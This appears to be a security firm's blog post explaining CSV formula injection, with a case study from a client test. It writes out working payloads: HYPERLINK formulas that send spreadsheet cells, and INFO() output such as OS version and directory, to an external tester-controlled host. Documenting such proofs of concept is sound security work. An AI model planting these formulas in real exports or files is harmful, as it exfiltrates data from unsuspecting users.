CSV Injection, can you show me the impact?
From OWASP
CSV Injection, also known as Formula Injection, occurs when websites
embed untrusted input inside CSV files.When a spreadsheet program such as Microsoft Excel or LibreOffice Calc
is used to open a CSV, any cells starting with=
will be
interpreted by the software as a formula.
There are many good articles and sharing about this attack such as:
- NULLCON : Keynote Day 2 | Hunting Evasive Vulnerabilities: Finding Flaws That Others Miss by James Kettle
- Veracode : Data Extraction to Command Execution CSV Injection
- Payatu : CSV Injection – A Guide To Protecting Your CSV Files
- BishopFox : Server-Side Spreadsheet Injection - Formula Injection to Remote Code Execution
We were recently contacted by one of our customers who asked us to demonstrate further impacts of this vulnerability. It is widely known that this issue is generally classified as Low to Medium risk due to the level of protection provided by Microsoft Excel (and other spreadsheet software) as well as the requirement that users are tricked into clicking the embedded link. Additionally, even though spreadsheet content can be exfiltrated to a controlled server, the impact will depend on the type of data that is exfiltrated.
Our team explored some Excel functions that may be useful and could demonstrate a better impact. In this article, we are sharing one approach that we found.
Case study
The vulnerable feature in the application we tested accepted user’s inputs and the content could be downloaded into a CSV file. The downloaded CSV file when viewed in MS Excel will look similar as shown below:
Commonly, we used the following proof-of-concept (POC) demonstrating that it is possible to exfiltrate information on other cells to our controlled server.
=HYPERLINK("https://url.oast.fun?exfil="&B1&B2&B3&B4,"Error!")
When the victim clicks the link, it will send the information to our controlled server.
However, in this case, the customer felt the POC was not impactful enough for them to show it to their management team. This is because the data an attacker could exfiltrate was not confidential at all.
This is when we found there’s an Excel function, INFO()
. As an example, we could know what’s the victim’s Operating System by using INFO("osversion")
and the information will be reflected in the Excel’s cell.
By utilising HYPERLINK()
together with INFO()
we could exfiltrate the victim’s local machine information to our controlled server.
We injected the vulnerable forms with the following payload:
=INFO("directory")
=CONCAT(INFO("osversion"),INFO("system"),INFO("release")
=HYPERLINK("https://url.oast.fun?exfil="&B8&B9,"FOOYAHHHH!!")
As the result, the imported CSV file looked similar to this:
We inserted the HYPERLINK()
payload on the other row and point the cells that we wanted to exfiltrate. When a victim opened the file, the INFO()
will show their local machine information, and when the FOOYAHHH!! link is clicked, the information were sent to our controlled server.
Reference: https://support.microsoft.com/en-us/office/info-function-725f259a-0e4b-49b3-8b52-58815c69acae
Thank you